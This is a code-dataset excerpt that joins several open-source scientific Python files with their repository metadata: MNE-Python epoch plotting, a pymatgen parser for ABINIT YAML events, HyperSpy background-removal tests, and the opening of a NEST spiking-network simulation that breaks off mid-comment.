larger than ``info['lowpass']`` (e.g., a 40 Hz lowpass will result in
at least a 120 Hz displayed sample rate).
.. versionadded:: 0.15.0
noise_cov : instance of Covariance | str | None
Noise covariance used to whiten the data while plotting.
Whitened data channels are scaled by ``scalings['whitened']``,
and their channel names are shown in italic.
Can be a string to load a covariance from disk.
See also :meth:`mne.Evoked.plot_white` for additional inspection
of noise covariance properties when whitening evoked data.
For data processed with SSS, the effective dependence between
magnetometers and gradiometers may introduce differences in scaling,
consider using :meth:`mne.Evoked.plot_white`.
.. versionadded:: 0.16.0
butterfly : bool
Whether to directly call the butterfly view.
.. versionadded:: 0.18.0
%(show_scrollbars)s
%(show_scalebars)s
.. versionadded:: 0.24.0
epoch_colors : list of (n_epochs) list (of n_channels) | None
Colors to use for individual epochs. If None, use default colors.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and associated event
integers as values. Useful when ``events`` contains event numbers not
present in ``epochs.event_id`` (e.g., because of event subselection).
Values in ``event_id`` will take precedence over those in
``epochs.event_id`` when there are overlapping keys.
.. versionadded:: 0.20
%(browse_group_by)s
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
Notes
-----
The arrow keys (up/down/left/right) can be used to navigate between
channels and epochs and the scaling can be adjusted with - and + (or =)
keys, but this depends on the backend matplotlib is configured to use
(e.g., mpl.use(``TkAgg``) should work). Full screen mode can be toggled
with f11 key. The amount of epochs and channels per view can be adjusted
with home/end and page down/page up keys. These can also be set through
options dialog by pressing ``o`` key. ``h`` key plots a histogram of
peak-to-peak values along with the used rejection thresholds. Butterfly
plot can be toggled with ``b`` key. Right mouse click adds a vertical line
to the plot. Click 'help' button at bottom left corner of the plotter to
view all the options.
.. versionadded:: 0.10.0
"""
from ._figure import _get_browser
epochs.drop_bad()
info = epochs.info.copy()
sfreq = info['sfreq']
projs = info['projs']
projs_on = np.full_like(projs, epochs.proj, dtype=bool)
if not epochs.proj:
with info._unlock():
info['projs'] = list()
# handle defaults / check arg validity
color = _handle_default('color', None)
scalings = _compute_scalings(scalings, epochs)
scalings = _handle_default('scalings_plot_raw', scalings)
if scalings['whitened'] == 'auto':
scalings['whitened'] = 1.
units = _handle_default('units', None)
unit_scalings = _handle_default('scalings', None)
decim, picks_data = _handle_decim(epochs.info.copy(), decim, None)
noise_cov = _check_cov(noise_cov, epochs.info)
event_id_rev = {v: k for k, v in (event_id or {}).items()}
_check_option('group_by', group_by,
('selection', 'position', 'original', 'type'))
# validate epoch_colors
_validate_type(epoch_colors, (list, None), 'epoch_colors')
if epoch_colors is not None:
if len(epoch_colors) != len(epochs.events):
msg = ('epoch_colors must have length equal to the number of '
f'epochs ({len(epochs)}); got length {len(epoch_colors)}.')
raise ValueError(msg)
for ix, this_colors in enumerate(epoch_colors):
_validate_type(this_colors, list, f'epoch_colors[{ix}]')
if len(this_colors) != len(epochs.ch_names):
msg = (f'epoch colors for epoch {ix} has length '
f'{len(this_colors)}, expected {len(epochs.ch_names)}.')
raise ValueError(msg)
# handle time dimension
n_epochs = min(n_epochs, len(epochs))
n_times = len(epochs) * len(epochs.times)
duration = n_epochs * len(epochs.times) / sfreq
# NB: this includes start and end of data:
boundary_times = np.arange(len(epochs) + 1) * len(epochs.times) / sfreq
# events
if events is not None:
event_nums = events[:, 2]
event_samps = events[:, 0]
epoch_n_samps = len(epochs.times)
# handle overlapping epochs (each event may show up in multiple places)
boundaries = (epochs.events[:, [0]] + np.array([-1, 1])
* epochs.time_as_index(0))
in_bounds = np.logical_and(boundaries[:, [0]] <= event_samps,
event_samps < boundaries[:, [1]])
event_ixs = [np.nonzero(a)[0] for a in in_bounds.T]
warned = False
event_times = list()
event_numbers = list()
for samp, num, _ixs in zip(event_samps, event_nums, event_ixs):
relevant_epoch_events = epochs.events[:, 0][_ixs]
if len(relevant_epoch_events) > 1 and not warned:
logger.info('You seem to have overlapping epochs. Some event '
'lines may be duplicated in the plot.')
warned = True
offsets = samp - relevant_epoch_events + epochs.time_as_index(0)
this_event_times = (_ixs * epoch_n_samps + offsets) / sfreq
event_times.extend(this_event_times)
event_numbers.extend([num] * len(_ixs))
event_nums = np.array(event_numbers)
event_times = np.array(event_times)
else:
event_nums = None
event_times = None
event_color_dict = _make_event_color_dict(event_color, events, event_id)
# determine trace order
picks = _picks_to_idx(info, picks)
n_channels = min(n_channels, len(picks))
ch_names = np.array(epochs.ch_names)
ch_types = np.array(epochs.get_channel_types())
order = _get_channel_plotting_order(order, ch_types, picks)
selections = None
if group_by in ('selection', 'position'):
selections = _setup_channel_selections(epochs, group_by, order)
order = np.concatenate(list(selections.values()))
default_selection = list(selections)[0]
n_channels = len(selections[default_selection])
# generate window title
if title is None:
title = epochs._name
if title is None or len(title) == 0:
title = 'Epochs'
elif not isinstance(title, str):
raise TypeError(f'title must be None or a string, got a {type(title)}')
params = dict(inst=epochs,
info=info,
n_epochs=n_epochs,
# channels and channel order
ch_names=ch_names,
ch_types=ch_types,
ch_order=order,
picks=order[:n_channels],
n_channels=n_channels,
picks_data=picks_data,
group_by=group_by,
ch_selections=selections,
# time
t_start=0,
duration=duration,
n_times=n_times,
first_time=0,
time_format='float',
decim=decim,
boundary_times=boundary_times,
# events
event_id_rev=event_id_rev,
event_color_dict=event_color_dict,
event_nums=event_nums,
event_times=event_times,
# preprocessing
projs=projs,
projs_on=projs_on,
apply_proj=epochs.proj,
remove_dc=True,
filter_coefs=None,
filter_bounds=None,
noise_cov=noise_cov,
use_noise_cov=noise_cov is not None,
# scalings
scalings=scalings,
units=units,
unit_scalings=unit_scalings,
# colors
ch_color_bad='lightgray',
ch_color_dict=color,
epoch_color_bad=(1, 0, 0),
epoch_colors=epoch_colors,
# display
butterfly=butterfly,
clipping=None,
scrollbars_visible=show_scrollbars,
scalebars_visible=show_scalebars,
window_title=title,
xlabel='Epoch number')
fig = _get_browser(**params)
fig._update_picks()
# make channel selection dialog, if requested (doesn't work well in init)
if group_by in ('selection', 'position'):
fig._create_selection_fig()
fig._update_projector()
fig._update_trace_offsets()
fig._update_data()
fig._draw_traces()
plt_show(show, block=block)
return fig
@verbose
def plot_epochs_psd(epochs, fmin=0, fmax=np.inf, tmin=None, tmax=None,
proj=False, bandwidth=None, adaptive=False, low_bias=True,
normalization='length', picks=None, ax=None, color='black',
xscale='linear', area_mode='std', area_alpha=0.33,
dB=True, estimate='auto', show=True, n_jobs=1,
average=False, line_alpha=None, spatial_colors=True,
sphere=None, exclude='bads', verbose=None):
"""%(plot_psd_doc)s.
Parameters
----------
epochs : instance of Epochs
The epochs object.
fmin : float
Start frequency to consider.
fmax : float
End frequency to consider.
tmin : float | None
Start time to consider.
tmax : float | None
End time to consider.
proj : bool
Apply projection.
bandwidth : float
The bandwidth of the multi taper windowing function in Hz. The default
value is a window half-bandwidth of 4.
adaptive : bool
Use adaptive weights to combine the tapered spectra into PSD
(slow, use n_jobs >> 1 to speed up computation).
low_bias : bool
Only use tapers with more than 90%% spectral concentration within
bandwidth.
%(normalization)s
%(plot_psd_picks_good_data)s
ax : instance of Axes | None
Axes to plot into. If None, axes will be created.
%(plot_psd_color)s
%(plot_psd_xscale)s
%(plot_psd_area_mode)s
%(plot_psd_area_alpha)s
%(plot_psd_dB)s
%(plot_psd_estimate)s
%(show)s
%(n_jobs)s
%(plot_psd_average)s
%(plot_psd_line_alpha)s
%(plot_psd_spatial_colors)s
%(topomap_sphere_auto)s
exclude : list of str | 'bads'
Channels names to exclude from being shown. If 'bads', the bad channels
are excluded. Pass an empty list to plot all channels (including
channels marked "bad", if any).
.. versionadded:: 0.24.0
%(verbose)s
Returns
-------
fig : instance of Figure
Figure with frequency spectra of the data channels.
"""
from ._mpl_figure import _psd_figure
# generate figure
# epochs always use multitaper, not Welch, so no need to allow "window"
# param above
fig = _psd_figure(
inst=epochs, proj=proj, picks=picks, axes=ax, tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax, sphere=sphere, xscale=xscale, dB=dB,
average=average, estimate=estimate, area_mode=area_mode,
line_alpha=line_alpha, area_alpha=area_alpha, color=color,
spatial_colors=spatial_colors, n_jobs=n_jobs, bandwidth=bandwidth,
adaptive=adaptive, low_bias=low_bias, normalization=normalization,
window='hamming', exclude=exclude)
plt_show(show)
return fig
| drammock/mne-python | mne/viz/epochs.py | Python | bsd-3-clause | 43,879 | [
"Gaussian"
] | 2b8171f0f1030a7a2a73c9f523163719c3d01fa6e3399792c0fb4f16de929d73 |
# coding: utf-8
"""
This module defines the events signaled by abinit during the execution. It also
provides a parser to extract these events form the main output file and the log file.
"""
from __future__ import unicode_literals, division, print_function
import os.path
import collections
import yaml
from monty.fnmatch import WildCard
from monty.termcolor import colored
from pymatgen.core import Structure
from pymatgen.serializers.json_coders import PMGSONable, pmg_serialize
from .abiinspect import YamlTokenizer
__all__ = [
"EventsParser",
]
def indent(lines, amount, ch=' '):
"""indent the lines in a string by padding each one with proper number of pad characters"""
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
def straceback():
"""Returns a string with the traceback."""
import traceback
return traceback.format_exc()
class AbinitEvent(yaml.YAMLObject): #, PMGSONable):
"""
Example (YAML syntax)::
Normal warning without any handler:
--- !Warning
message: |
This is a normal warning that won't
trigger any handler in the python code!
src_file: routine_name
src_line: 112
...
Critical warning that will trigger some action in the python code.
--- !ScfConvergeWarning
message: |
The human-readable message goes here!
src_file: foo.F90
src_line: 112
tolname: tolwfr
actual_tol: 1.0e-8
required_tol: 1.0e-10
nstep: 50
...
The algorithm to extract the YAML sections is very simple.
1) We use YamlTokenizer to extract the documents from the output file
2) If we have a tag that ends with "Warning", "Error", "Bug", "Comment
we know we have encountered a new ABINIT event
3) We parse the document with yaml.load(doc.text) and we get the object
Note that:
# --- and ... become reserved words (whey they are placed at
the begining of a line) since they are used to mark the beginning and
the end of YAML documents.
# All the possible events should subclass `AbinitEvent` and define
the class attribute yaml_tag so that yaml.load will know how to
build the instance.
"""
#color = None
def __init__(self, message, src_file, src_line):
"""
Basic constructor for :class:`AbinitEvent`.
Args:
message: String with human-readable message providing info on the event.
src_file: String with the name of the Fortran file where the event is raised.
src_line Integer giving the line number in src_file.
"""
self.message = message
self._src_file = src_file
self._src_line = src_line
@pmg_serialize
def as_dict(self):
return dict(message=self.message, src_file=self.src_file, src_line=self.src_line)
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop('@module', None)
d.pop('@class', None)
return cls(**d)
@property
def header(self):
return "%s at %s:%s" % (self.name, self.src_file, self.src_line)
def __str__(self):
return "\n".join((self.header, self.message))
@property
def src_file(self):
"""String with the name of the Fortran file where the event is raised."""
try:
return self._src_file
except AttributeError:
return "Unknown"
@property
def src_line(self):
"""Integer giving the line number in src_file."""
try:
return self._src_line
except AttributeError:
return "Unknown"
@property
def name(self):
"""Name of the event (class name)"""
return self.__class__.__name__
@property
def baseclass(self):
"""The baseclass of self."""
for cls in _BASE_CLASSES:
if isinstance(self, cls):
return cls
raise ValueError("Cannot determine the base class of %s" % self.__class__.__name__)
def log_correction(self, task, message):
"""
This method should be called once we have fixed the problem associated to this event.
It adds a new entry in the correction history of the task.
Args:
message (str): Human-readable string with info on the action perfomed to solve the problem.
"""
task._corrections.append(dict(
event=self.as_dict(),
message=message,
))
def correct(self, task):
"""
This method is called when an error is detected in a :class:`Task`
It should perform any corrective measures relating to the detected error.
The idea is similar to the one used in custodian but the handler receives
a :class:`Task` object so that we have access to its methods.
Returns:
(dict) JSON serializable dict that describes the errors and actions taken. E.g.
{"errors": list_of_errors, "actions": list_of_actions_taken}.
If this is an unfixable error, actions should be set to None.
"""
return 0
class AbinitComment(AbinitEvent):
"""Base class for Comment events"""
yaml_tag = '!COMMENT'
color = "blue"
class AbinitError(AbinitEvent):
"""Base class for Error events"""
yaml_tag = '!ERROR'
color = "red"
class AbinitYamlError(AbinitError):
"""Raised if the YAML parser cannot parse the document and the doc tag is an Error."""
class AbinitBug(AbinitEvent):
"""Base class for Bug events"""
yaml_tag = '!BUG'
color = "red"
class AbinitWarning(AbinitEvent):
"""
Base class for Warning events (the most important class).
Developers should subclass this class to define the different exceptions
raised by the code and the possible actions that can be performed.
"""
yaml_tag = '!WARNING'
color = None
class AbinitCriticalWarning(AbinitWarning):
color = "red"
class AbinitYamlWarning(AbinitCriticalWarning):
"""
Raised if the YAML parser cannot parse the document and the doc tas is a Warning.
"""
# Warnings that trigger restart.
class ScfConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the GS SCF cycle did not converge."""
yaml_tag = '!ScfConvergenceWarning'
class NscfConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the GS NSCF cycle did not converge."""
yaml_tag = '!NscfConvergenceWarning'
class RelaxConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the structural relaxation did not converge."""
yaml_tag = '!RelaxConvergenceWarning'
# TODO: for the time being we don't discern between GS and PhononCalculations.
#class PhononConvergenceWarning(AbinitCriticalWarning):
# """Warning raised when the phonon calculation did not converge."""
# yaml_tag = u'!PhononConvergenceWarning'
class QPSConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the QPS iteration (GW) did not converge."""
yaml_tag = '!QPSConvergenceWarning'
class HaydockConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the Haydock method (BSE) did not converge."""
yaml_tag = '!HaydockConvergenceWarning'
# Error classes providing a correct method.
class DilatmxError(AbinitError):
yaml_tag = '!DilatmxError'
def correct(self, task):
#Idea: decrease dilatxm and restart from the last structure.
#We would like to end up with a structures optimized with dilatmx 1.01
#that will be used for phonon calculations.
# Read the last structure dumped by ABINIT before aborting.
print("in dilatmx")
filepath = task.outdir.has_abiext("DILATMX_STRUCT.nc")
last_structure = Structure.from_file(filepath)
task._change_structure(last_structure)
#changes = task._modify_vars(dilatmx=1.05)
task.history.append("Take last structure from DILATMX_STRUCT.nc, will try to restart")
return 1
# Register the concrete base classes.
_BASE_CLASSES = [
AbinitComment,
AbinitError,
AbinitBug,
AbinitWarning,
]
class EventReport(collections.Iterable):
"""
Iterable storing the events raised by an ABINIT calculation.
Attributes::
stat: information about a file as returned by os.stat
"""
def __init__(self, filename, events=None):
"""
List of ABINIT events.
Args:
filename: Name of the file
events: List of Event objects
"""
self.filename = os.path.abspath(filename)
self.stat = os.stat(self.filename)
self._events = []
self._events_by_baseclass = collections.defaultdict(list)
if events is not None:
for ev in events:
self.append(ev)
def __len__(self):
return len(self._events)
def __iter__(self):
return self._events.__iter__()
def __str__(self):
#has_colours = stream_has_colours(stream)
has_colours = True
lines = []
app = lines.append
app("Events for: %s" % self.filename)
for i, event in enumerate(self):
if has_colours:
app("[%d] %s" % (i+1, colored(event.header, color=event.color)))
app(indent(event.message, 4))
else:
app("[%d] %s" % (i+1, str(event)))
app("num_errors: %s, num_warnings: %s, num_comments: %s, completed: %s" % (
self.num_errors, self.num_warnings, self.num_comments, self.run_completed))
return "\n".join(lines)
def append(self, event):
"""Add an event to the list."""
self._events.append(event)
self._events_by_baseclass[event.baseclass].append(event)
def set_run_completed(self, bool_value):
"""Set the value of _run_completed."""
self._run_completed = bool_value
@property
def run_completed(self):
"""True if the calculation terminated."""
try:
return self._run_completed
except AttributeError:
return False
@property
def comments(self):
"""List of comments found."""
return self.select(AbinitComment)
@property
def errors(self):
"""List of errors found."""
return self.select(AbinitError)
@property
def bugs(self):
"""List of bugs found."""
return self.select(AbinitBug)
@property
def warnings(self):
"""List of warnings found."""
return self.select(AbinitWarning)
@property
def num_warnings(self):
"""Number of warnings reported."""
return len(self.warnings)
@property
def num_errors(self):
"""Number of errors reported."""
return len(self.errors)
@property
def num_comments(self):
"""Number of comments reported."""
return len(self.comments)
def select(self, base_class):
"""
Return the list of events that inherits from class base_class
Args:
only_critical: if True, only critical events are returned.
"""
return self._events_by_baseclass[base_class][:]
def filter_types(self, event_types):
events = []
for ev in self:
if type(ev) in event_types: events.append(ev)
return self.__class__(filename=self.filename, events=events)
class EventsParserError(Exception):
"""Base class for the exceptions raised by :class:`EventsParser`."""
class EventsParser(object):
"""
Parses the output or the log file produced by abinit and extract the list of events.
"""
Error = EventsParserError
# Internal flag used for debugging
DEBUG_LEVEL = 0
def parse(self, filename):
"""
Parse the given file. Return :class:`EventReport`.
"""
run_completed = False
filename = os.path.abspath(filename)
report = EventReport(filename)
# TODO Use CamelCase for the Fortran messages.
# Bug is still an error of class SoftwareError
w = WildCard("*Error|*Warning|*Comment|*Bug|*ERROR|*WARNING|*COMMENT|*BUG")
with YamlTokenizer(filename) as tokens:
for doc in tokens:
#print(80*"*")
#print("doc.tag", doc.tag)
#print("doc", doc)
#print(80*"*")
if w.match(doc.tag):
#print("got doc.tag", doc.tag,"--")
try:
event = yaml.load(doc.text)
except:
# Wrong YAML doc. Check tha doc tag and instantiate the proper event.
message = "Malformatted YAML document at line: %d\n" % doc.lineno
message += doc.text
# This call is very expensive when we have many exceptions due to malformatted YAML docs.
if self.DEBUG_LEVEL:
message += "Traceback:\n %s" % straceback()
if "error" in doc.tag.lower():
print("It seems an error", doc.tag)
event = AbinitYamlError(message=message, src_file=__file__, src_line=0)
else:
event = AbinitYamlWarning(message=message, src_file=__file__, src_line=0)
event.lineno = doc.lineno
report.append(event)
# Check whether the calculation completed.
if doc.tag == "!FinalSummary":
run_completed = True
report.set_run_completed(run_completed)
return report
def report_exception(self, filename, exc):
"""
This method is used when self.parser raises an Exception so that
we can report a customized :class:`EventReport` object with info the exception.
"""
return EventReport(filename, events=[AbinitError(str(exc))])
| Dioptas/pymatgen | pymatgen/io/abinitio/events.py | Python | mit | 14,084 | [
"ABINIT",
"pymatgen"
] | 8ce9e7c2d5953d2b033390543f68e6f1ec6b997b7644400dd864a86b0c038051 |
# -*- coding: utf-8 -*-
# Copyright 2007-2016 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import pytest
from hyperspy import signals
from hyperspy import components1d
from hyperspy.decorators import lazifyTestClass
@lazifyTestClass
class TestRemoveBackground1DGaussian:
def setup_method(self, method):
gaussian = components1d.Gaussian()
gaussian.A.value = 10
gaussian.centre.value = 10
gaussian.sigma.value = 1
self.signal = signals.Signal1D(
gaussian.function(np.arange(0, 20, 0.01)))
self.signal.axes_manager[0].scale = 0.01
self.signal.metadata.Signal.binned = False
def test_background_remove_gaussian(self):
s1 = self.signal.remove_background(
signal_range=(None, None),
background_type='Gaussian',
show_progressbar=None)
assert np.allclose(s1.data, np.zeros(len(s1.data)))
def test_background_remove_gaussian_full_fit(self):
s1 = self.signal.remove_background(
signal_range=(None, None),
background_type='Gaussian',
fast=False)
assert np.allclose(s1.data, np.zeros(len(s1.data)))
@lazifyTestClass
class TestRemoveBackground1DPowerLaw:
def setup_method(self, method):
pl = components1d.PowerLaw()
pl.A.value = 1e10
pl.r.value = 3
self.signal = signals.Signal1D(
pl.function(np.arange(100, 200)))
self.signal.axes_manager[0].offset = 100
self.signal.metadata.Signal.binned = False
self.signal_noisy = self.signal.deepcopy()
self.signal_noisy.add_gaussian_noise(1)
self.atol = 0.04 * abs(self.signal.data).max()
self.atol_zero_fill = 0.04 * abs(self.signal.isig[10:].data).max()
def test_background_remove_pl(self):
s1 = self.signal.remove_background(
signal_range=(None, None),
background_type='PowerLaw',
show_progressbar=None)
# since we compare to zero, rtol can't be used (see np.allclose doc)
assert np.allclose(s1.data, np.zeros(len(s1.data)), atol=self.atol)
assert s1.axes_manager.navigation_dimension == 0
def test_background_remove_pl_zero(self):
s1 = self.signal_noisy.remove_background(
signal_range=(110.0, 190.0),
background_type='PowerLaw',
zero_fill=True,
show_progressbar=None)
# since we compare to zero, rtol can't be used (see np.allclose doc)
assert np.allclose(s1.isig[10:], np.zeros(len(s1.data[10:])),
atol=self.atol_zero_fill)
assert np.allclose(s1.data[:10], np.zeros(10))
def test_background_remove_pl_int(self):
self.signal.change_dtype("int")
s1 = self.signal.remove_background(
signal_range=(None, None),
background_type='PowerLaw',
show_progressbar=None)
# since we compare to zero, rtol can't be used (see np.allclose doc)
assert np.allclose(s1.data, np.zeros(len(s1.data)), atol=self.atol)
def test_background_remove_pl_int_zero(self):
self.signal_noisy.change_dtype("int")
s1 = self.signal_noisy.remove_background(
signal_range=(110.0, 190.0),
background_type='PowerLaw',
zero_fill=True,
show_progressbar=None)
# since we compare to zero, rtol can't be used (see np.allclose doc)
assert np.allclose(s1.isig[10:], np.zeros(len(s1.data[10:])),
atol=self.atol_zero_fill)
assert np.allclose(s1.data[:10], np.zeros(10))
def compare_axes_manager_metadata(s0, s1):
assert s0.data.shape == s1.data.shape
assert s0.axes_manager.shape == s1.axes_manager.shape
for iaxis in range(len(s0.axes_manager._axes)):
a0, a1 = s0.axes_manager[iaxis], s1.axes_manager[iaxis]
assert a0.name == a1.name
assert a0.units == a1.units
assert a0.scale == a1.scale
assert a0.offset == a1.offset
assert s0.metadata.General.title == s1.metadata.General.title
@pytest.mark.parametrize('nav_dim', [0, 1])
@pytest.mark.parametrize('fast', [True, False])
@pytest.mark.parametrize('zero_fill', [True, False])
@pytest.mark.parametrize('show_progressbar', [True, False])
@pytest.mark.parametrize('plot_remainder', [True, False])
@pytest.mark.parametrize('background_type',
['Power Law', 'Polynomial', 'Offset'])
def test_remove_background_metadata_axes_manager_copy(nav_dim,
fast,
zero_fill,
show_progressbar,
plot_remainder,
background_type):
if nav_dim == 0:
s = signals.Signal1D(np.arange(10, 100)[::-1])
else:
s = signals.Signal1D(np.arange(10, 210)[::-1].reshape(2, 100))
s.axes_manager[0].name = 'axis0'
s.axes_manager[0].units = 'units0'
s.axes_manager[0].scale = 0.9
s.axes_manager[0].offset = 1.
s.metadata.General.title = "atitle"
s_r = s.remove_background(signal_range=(2, 50),
fast=fast,
zero_fill=zero_fill,
show_progressbar=show_progressbar,
plot_remainder=plot_remainder,
background_type=background_type)
compare_axes_manager_metadata(s, s_r)
| MartialD/hyperspy | hyperspy/tests/signal/test_remove_background.py | Python | gpl-3.0 | 6,248 | [
"Gaussian"
] | dcefc42632ef2d1d9a157be0d6ef8830ee5e43a4bcf58f07852aca1ed1bb32d7 |
# -*- coding: utf-8 -*-
#
# brunel_alpha_nest.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""Random balanced network (alpha synapses) connected with NEST
------------------------------------------------------------------
This script simulates an excitatory and an inhibitory population on
the basis of the network used in [1]
In contrast to brunel-alpha-numpy.py, this variant uses NEST's builtin
connection routines to draw the random connections instead of NumPy.
When connecting the network customary synapse models are used, which
allow for querying the number of created synapses. Using spike
detectors the average firing rates of the neurons in the populations
are established. The building as well as the simulation time of the
network are recorded.
References
~~~~~~~~~~~~~
.. [1] Brunel N, Dynamics of Sparsely Connected Networks of Excitatory and
Inhibitory Spiking Neurons, Journal of Computational Neuroscience 8,
183-208 (2000).
See Also
~~~~~~~~~~~~
brunel-alpha-numpy.py
:Authors:
KEYWORDS:
"""
###############################################################################
# Import all necessary modules for simulation, analysis and plotting. Scipy
# should be imported before nest.
from scipy.optimize import fsolve
import nest
import nest.raster_plot
import time
from numpy import exp
###############################################################################
# Definition of functions used in this example. First, define the Lambert W
# function implemented in SLI. The second function computes the maximum of
# the postsynaptic potential for a synaptic input current of unit amplitude (
# 1 pA) using the Lambert W function. Thus function will later be used to
# calibrate the synaptic weights.
def LambertWm1(x):
nest.ll_api.sli_push(x)
nest.ll_api.sli_run('LambertWm1')
y = nest.ll_api.sli_pop()
return y
def ComputePSPnorm(tauMem, CMem, tauSyn):
a = (tauMem / tauSyn)
b = (1.0 / tauSyn - 1.0 / tauMem)
# time of maximum
t_max = 1.0 / b * (-LambertWm1(-exp(-1.0 / a) / a) - 1.0 / a)
# maximum of PSP for current of unit amplitude
return (exp(1.0) / (tauSyn * CMem * b) *
((exp(-t_max / tauMem) - exp(-t_max / tauSyn)) / b -
t_max * exp(-t_max / tauSyn)))
nest.ResetKernel()
###############################################################################
# Assigning the current time to a variable in order to determine the build
# time of the network.
startbuild = time.time()
###############################################################################
# Assigning the simulation parameters to variables.
dt = 0.1 # the resolution in ms
simtime = 1000.0 # Simulation time in ms
delay = 1.5 # synaptic delay in ms
###############################################################################
# Definition of the parameters crucial for asynchronous irregular firing of
# the neurons.
g = 5.0 # ratio inhibitory weight/excitatory weight
eta = 2.0 # external rate relative to threshold rate
epsilon = 0.1 # connection probability
###############################################################################
# Definition of the number of neurons in the network and the number of neuron
# recorded from
order = 2500
NE = 4 * order # number of excitatory neurons
NI = 1 * order # number of inhibitory neurons
N_neurons = NE + NI # number of neurons in total
N_rec = 50 # record from 50 neurons
###############################################################################
# Definition of connectivity parameter
CE = int(epsilon * NE) # number of excitatory synapses per neuron
CI = int(epsilon * NI) # number of inhibitory synapses per neuron
C_tot = int(CI + CE) # total number of synapses per neuron
###############################################################################
# Initialization of the parameters of the integrate and fire neuron and the
# synapses. The parameter of the neuron are stored in a dictionary. The
# synaptic currents are normalized such that the amplitude of the PSP is J.
tauSyn = 0.5 # synaptic time constant in ms
tauMem = 20.0 # time constant of membrane potential in ms
CMem = 250.0 # capacitance of membrane in in pF
theta = 20.0 # membrane threshold potential in mV
neuron_params = {"C_m": CMem,
"tau_m": tauMem,
"tau_syn_ex": tauSyn,
"tau_syn_in": tauSyn,
"t_ref": 2.0,
"E_L": 0.0,
"V_reset": 0.0,
"V_m": 0.0,
"V_th": theta}
J = 0.1 # postsynaptic amplitude in mV
J_unit = ComputePSPnorm(tauMem, CMem, tauSyn)
J_ex = J / J_unit # amplitude of excitatory postsynaptic current
J_in = -g * J_ex # amplitude of inhibitory postsynaptic current
###############################################################################
# Definition of threshold rate, which is the external rate needed to fix the
# membrane potential around its threshold, the external firing rate and the
# rate of the poisson generator which is multiplied by the in-degree CE and
# converted to Hz by multiplication by 1000.
nu_th = (theta * CMem) / (J_ex * CE * exp(1) * tauMem * tauSyn)
nu_ex = eta * nu_th
p_rate = 1000.0 * nu_ex * CE
###############################################################################
# Configuration of the simulation kernel by the previously defined time
# resolution used in the simulation. Setting "print_time" to True prints the
# already processed simulation time as well as its percentage of the total
# simulation time.
nest.SetKernelStatus({"resolution": dt, "print_time": True,
"overwrite_files": True})
print("Building network")
###############################################################################
# Configuration of the model `iaf_psc_alpha` and `poisson_generator` using
# SetDefaults(). This function expects the model to be the inserted as a
# string and the parameter to be specified in a dictionary. All instances of
# theses models created after this point will have the properties specified
# in the dictionary by default.
nest.SetDefaults("iaf_psc_alpha", neuron_params)
nest.SetDefaults("poisson_generator", {"rate": p_rate})
###############################################################################
# Creation of the nodes using `Create`. We store the returned handles in
# variables for later reference. Here the excitatory and inhibitory, as well
# as the poisson generator and two spike detectors. The spike detectors will
# later be used to record excitatory and inhibitory spikes.
nodes_ex = nest.Create("iaf_psc_alpha", NE)
nodes_in = nest.Create("iaf_psc_alpha", NI)
noise = nest.Create("poisson_generator")
espikes = nest.Create("spike_detector")
ispikes = nest.Create("spike_detector")
###############################################################################
# Configuration of the spike detectors recording excitatory and inhibitory
# spikes using `SetStatus`, which expects a list of node handles and a list
# of parameter dictionaries. Setting the variable "to_file" to True ensures
# that the spikes will be recorded in a .gdf file starting with the string
# assigned to label. Setting "withtime" and "withgid" to True ensures that
# each spike is saved to file by stating the gid of the spiking neuron and
# the spike time in one line.
nest.SetStatus(espikes, [{"label": "brunel-py-ex",
"withtime": True,
"withgid": True,
"to_file": True}])
nest.SetStatus(ispikes, [{"label": "brunel-py-in",
"withtime": True,
"withgid": True,
"to_file": True}])
print("Connecting devices")
###############################################################################
# Definition of a synapse using `CopyModel`, which expects the model name of
# a pre-defined synapse, the name of the customary synapse and an optional
# parameter dictionary. The parameters defined in the dictionary will be the
# default parameter for the customary synapse. Here we define one synapse for
# the excitatory and one for the inhibitory connections giving the
# previously defined weights and equal delays.
nest.CopyModel("static_synapse", "excitatory",
{"weight": J_ex, "delay": delay})
nest.CopyModel("static_synapse", "inhibitory",
{"weight": J_in, "delay": delay})
###############################################################################
# Connecting the previously defined poisson generator to the excitatory and
# inhibitory neurons using the excitatory synapse. Since the poisson
# generator is connected to all neurons in the population the default rule (
# 'all_to_all') of Connect() is used. The synaptic properties are inserted
# via syn_spec which expects a dictionary when defining multiple variables or
# a string when simply using a pre-defined synapse.
nest.Connect(noise, nodes_ex, syn_spec="excitatory")
nest.Connect(noise, nodes_in, syn_spec="excitatory")
###############################################################################
# Connecting the first N_rec nodes of the excitatory and inhibitory
# population to the associated spike detectors using excitatory synapses.
# Here the same shortcut for the specification of the synapse as defined
# above is used.
nest.Connect(nodes_ex[:N_rec], espikes, syn_spec="excitatory")
nest.Connect(nodes_in[:N_rec], ispikes, syn_spec="excitatory")
print("Connecting network")
print("Excitatory connections")
###############################################################################
# Connecting the excitatory population to all neurons using the pre-defined
# excitatory synapse. Beforehand, the connection parameter are defined in a
# dictionary. Here we use the connection rule 'fixed_indegree',
# which requires the definition of the indegree. Since the synapse
